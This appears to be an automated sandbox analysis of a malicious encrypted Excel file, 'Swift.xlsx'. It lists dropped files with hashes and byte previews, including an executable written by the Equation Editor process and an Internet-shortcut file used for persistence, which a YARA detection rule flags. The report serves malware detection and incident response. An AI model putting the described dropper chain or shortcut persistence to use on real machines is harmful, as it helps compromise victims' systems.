                                Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38A6D1D2.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):68702
                                Entropy (8bit):7.960564589117156
                                Encrypted:false
                                SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                Malicious:false
                                Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C8D526.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):10202
                                Entropy (8bit):7.870143202588524
                                Encrypted:false
                                SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                MD5:66EF10508ED9AE9871D59F267FBE15AA
                                SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                Malicious:false
                                Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42F2BF3.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 838 x 469, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):21987
                                Entropy (8bit):7.952828365949915
                                Encrypted:false
                                SSDEEP:384:MoaqtIZxNY3dMzKeijXyso4gYhVZAUrE68p/DazS396RFnDUhkhiedxQ9:AqtIZzYNM+HjXyjOhVZW68pPWGedO9
                                MD5:5A25F525D9F0D658AF52A4F78FE031D4
                                SHA1:525FB63F75E745FBC90E4E42E624E030C5DF94EB
                                SHA-256:D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
                                SHA-512:FE2F2D9744CE7235F4DBC36861249372C42B85920B6A1C75A8B2C330BD07F7C4C12A5DF5CA9AAED4C2BCDAD9D196DFF3A34732EE296FE6F006A16ACC41F5EEC3
                                Malicious:false
                                Preview: .PNG........IHDR...F................PLTE...0.....T[c..........................f..................9.....d.........k9u....b...........9....f..kr............t.......e.......9....]X........./.;9.................h..........d.<...({...........t_.....................c7..Ga.06?....._..V.....T..............9......e......ee...........f......:;.D."...h..............e...............Q....E.......l..~..t"....D.............................:....9...........T.........^..d9;....iv...09.Z...........................................................................$...ee9h.G..........................................~........................................;<.........`....................99....5..............................................................AL...R.IDATx...`..&.H......-@.n..]A... ..Fn.!`$X..&&..X@$c..dl<.#...PD....$&".1..h.N..Y3..L6.d.$.XFw..;&(a....=.:..Z].].Q....S..;.?...W%.D....1..s.!....4....`{U'.QU........~.e.*....
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4CA30D58.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):68702
                                Entropy (8bit):7.960564589117156
                                Encrypted:false
                                SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                Malicious:false
                                Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D5F6EF.jpeg
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                Category:dropped
                                Size (bytes):85020
                                Entropy (8bit):7.2472785111025875
                                Encrypted:false
                                SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                MD5:738BDB90A9D8929A5FB2D06775F3336F
                                SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                Malicious:false
                                Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B697C424.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):83904
                                Entropy (8bit):7.986000888791215
                                Encrypted:false
                                SSDEEP:1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
                                MD5:9F9A7311810407794A153B7C74AED720
                                SHA1:EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
                                SHA-256:000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
                                SHA-512:27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
                                Malicious:false
                                Preview: .PNG........IHDR.............oi......IDATx..u|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.*....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v*:.....M......YUe.N....TI.*..]NQ.<..vm....o....|yt:......P..d.]....bE.zr.....*UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA1488DD.emf
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                Category:dropped
                                Size (bytes):498420
                                Entropy (8bit):0.6411729750186352
                                Encrypted:false
                                SSDEEP:384:KXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:sXwBkNWZ3cjvmWa+VDO
                                MD5:E34E1237F085DEB7E5C5B938C6C659B2
                                SHA1:AEA96141A3412AFB7E145F49944BE893CA3FB164
                                SHA-256:CE27BA7228F10D6C4C087926A2C74D644921CBFD3F9843F4FADD4C71073F1AC6
                                SHA-512:677DD541ADC14DE4EAC107A2D7242930B47CA79F7F25832D02B0FB14B7665F62CF3F3884CA75672F594C7EFA9729DBED364947C1783D9CFCC5025C4690C2E8F3
                                Malicious:false
                                Preview: ....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................nZ$...../..fxZ.@-.%...../.(./......./.../.RQ.[../.../......./.p./.$Q.[../.../. ...IdxZ../.../. ............dxZ............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i............./.X...../.../..8pZ........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D59453AB.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):11303
                                Entropy (8bit):7.909402464702408
                                Encrypted:false
                                SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                Malicious:false
                                Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E55F4DD5.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 838 x 469, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):21987
                                Entropy (8bit):7.952828365949915
                                Encrypted:false
                                SSDEEP:384:MoaqtIZxNY3dMzKeijXyso4gYhVZAUrE68p/DazS396RFnDUhkhiedxQ9:AqtIZzYNM+HjXyjOhVZW68pPWGedO9
                                MD5:5A25F525D9F0D658AF52A4F78FE031D4
                                SHA1:525FB63F75E745FBC90E4E42E624E030C5DF94EB
                                SHA-256:D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
                                SHA-512:FE2F2D9744CE7235F4DBC36861249372C42B85920B6A1C75A8B2C330BD07F7C4C12A5DF5CA9AAED4C2BCDAD9D196DFF3A34732EE296FE6F006A16ACC41F5EEC3
                                Malicious:false
                                Preview: .PNG........IHDR...F................PLTE...0.....T[c..........................f..................9.....d.........k9u....b...........9....f..kr............t.......e.......9....]X........./.;9.................h..........d.<...({...........t_.....................c7..Ga.06?....._..V.....T..............9......e......ee...........f......:;.D."...h..............e...............Q....E.......l..~..t"....D.............................:....9...........T.........^..d9;....iv...09.Z...........................................................................$...ee9h.G..........................................~........................................;<.........`....................99....5..............................................................AL...R.IDATx...`..&.H......-@.n..]A... ..Fn.!`$X..&&..X@$c..dl<.#...PD....$&".1..h.N..Y3..L6.d.$.XFw..;&(a....=.:..Z].].Q....S..;.?...W%.D....1..s.!....4....`{U'.QU........~.e.*....
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F77E15F1.jpeg
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                Category:dropped
                                Size (bytes):85020
                                Entropy (8bit):7.2472785111025875
                                Encrypted:false
                                SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                MD5:738BDB90A9D8929A5FB2D06775F3336F
                                SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                Malicious:false
                                Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF28013A.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):83904
                                Entropy (8bit):7.986000888791215
                                Encrypted:false
                                SSDEEP:1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
                                MD5:9F9A7311810407794A153B7C74AED720
                                SHA1:EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
                                SHA-256:000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
                                SHA-512:27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
                                Malicious:false
                                Preview: .PNG........IHDR.............oi......IDATx..u|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.*....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v*:.....M......YUe.N....TI.*..]NQ.<..vm....o....|yt:......P..d.]....bE.zr.....*UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\KZ513KEB.txt
                                Process:C:\Users\Public\vbc.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):63
                                Entropy (8bit):4.0467575593287775
                                Encrypted:false
                                SSDEEP:3:vpqMLJUQ2Vxlx2EPHUYfvMTe:vEMWXVfxxPUsvMTe
                                MD5:6D7988E636E80D4FFABE1D866AB3BDF2
                                SHA1:CDB275A3662EF35B1C67B943AF4F893DD02BD9EC
                                SHA-256:8AB16B651DB65729715FA67C72DBC1246B5977949628B9CB86AAB7B6AD96D8E8
                                SHA-512:5C7AD1D306631945FFEA2677CBA9F3A3120E5F9F1DC79E7AF8FFB1AFD8A33FC5FEB91F08196F29705EB38106EEFF09155F2F133A9F7F5C336064AA04B3EFC4BB
                                Malicious:false
                                IE Cache URL:live.com/
                                Preview: wla42..live.com/.1536.375019136.30918084.4169104966.30916751.*.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZI4B61S9.txt
                                Process:C:\Users\Public\vbc.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):63
                                Entropy (8bit):4.023713852754437
                                Encrypted:false
                                SSDEEP:3:vpqMLJUQ2XaS2EPrZ84lTe:vEMWXX5xjVlTe
                                MD5:5729B36FD27014124F593B32CF5EFCE9
                                SHA1:297A777F996A254F93931AD3B061E83809ED17A5
                                SHA-256:329B0562784F8FB7C67C0B116C15C73DCD837AD78EAE005A34F077681184A91A
                                SHA-512:4B948139C3F33E81CAE06AE24490A318495013FAC34DDCF9F78C5F6763555F78317DEDE2B2F7960198422D1D273935599F287F7CA23E8D481397EEC8A65F459C
                                Malicious:false
                                Preview: wla42..live.com/.1536.355019136.30918084.4143604054.30916751.*.
                                C:\Users\user\Desktop\~$Swift.xlsx
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):1.4377382811115937
                                Encrypted:false
                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                Malicious:false
                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe
                                Process:C:\Users\Public\vbc.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1014784
                                Entropy (8bit):6.809458920712055
                                Encrypted:false
                                SSDEEP:12288:GrHeuodar6Dd3m4aS9FCZXhGiX1d0uVrLGaDOdJ4NUTj94rv4lprmi:GDe0W1m4aVNTc9jOij2rqpm
                                MD5:A65B1815177EF9EBA7E5E894BBF65A3C
                                SHA1:5459ECF044E62BFB53220D0E78A5B98C24F17E25
                                SHA-256:298D542746DFA4922DD5FBC8FAB572BE58447C9DBD1481C55BD2254BB275684F
                                SHA-512:0F05D5E05D51FBE5289330CA2C5486C49369728005C6D19B548D3F419FBF52F25AA50007271B315636AEDB311A43485989E4F6DE8154869D0AC7AFFB0F0E3DB1
                                Malicious:true
                                Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,.............@..............................................@..............................`'........................... ......................................................................................CODE................................ ..`DATA....d...........................@...BSS......................................idata..`'.......(..................@....tls....@................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................|..............@..P........................................................................................................................................
                                C:\Users\Public\Libraries\hpvdsxZ.url
                                Process:C:\Users\Public\vbc.exe
                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Zxsdvph\\Zxsdvph.exe">), ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):96
                                Entropy (8bit):4.866547012067739
                                Encrypted:false
                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMxWlVt/dWlViASsGKd6ov:HRYFVmTWDyz+8uPiASsbDv
                                MD5:C115406F74CA774E3B1F5F2037D15E84
                                SHA1:8109B72A1B04D79574D5A7BA652A813A390AE637
                                SHA-256:B012DBEB68164BD92020760E7D57A5B21B0D73255005BBE708A19C201D3C9F1C
                                SHA-512:991F4A6639148929BFE6EDBD804C40A28A9166DB47D9959D4494D9DF963C8752A0E0D415341B078B7B2ECB721F3DD0D7E1AB251DF55106C9D2E6B678B116208E
                                Malicious:false
                                Yara Hits:
                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\hpvdsxZ.url, Author: @itsreallynick (Nick Carr)
                                Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Zxsdvph\\Zxsdvph.exe"..IconIndex=2..
                                C:\Users\Public\vbc.exe
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1014784
                                Entropy (8bit):6.809458920712055
                                Encrypted:false
                                SSDEEP:12288:GrHeuodar6Dd3m4aS9FCZXhGiX1d0uVrLGaDOdJ4NUTj94rv4lprmi:GDe0W1m4aVNTc9jOij2rqpm
                                MD5:A65B1815177EF9EBA7E5E894BBF65A3C
                                SHA1:5459ECF044E62BFB53220D0E78A5B98C24F17E25
                                SHA-256:298D542746DFA4922DD5FBC8FAB572BE58447C9DBD1481C55BD2254BB275684F
                                SHA-512:0F05D5E05D51FBE5289330CA2C5486C49369728005C6D19B548D3F419FBF52F25AA50007271B315636AEDB311A43485989E4F6DE8154869D0AC7AFFB0F0E3DB1
                                Malicious:true
                                Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,.............@..............................................@..............................`'........................... ......................................................................................CODE................................ ..`DATA....d...........................@...BSS......................................idata..`'.......(..................@....tls....@................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................|..............@..P........................................................................................................................................

                                Static File Info

                                General

                                File type:CDFV2 Encrypted
                                Entropy (8bit):7.972337446998264
                                TrID:
                                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                File name:Swift.xlsx
                                File size:341944
                                MD5:9a43d5d2ffc56e823280ca84f6bb870f
                                SHA1:f0945075b44bc2cb2c96b168d47a269eb0d714ce
                                SHA256:88c07a30074065b292335ae5d4a45f905fa8a6739d3031d2f8236d2d9a27c681
                                SHA512:b46f3e608f57ae5156336355f0c7bf90ab655f3db16a0318ee0ac6b16e01ee8b5ed4eab78e3662093f9b3d2cae0bbdc9811367b3bb1ccf39098abe731ff2dd67
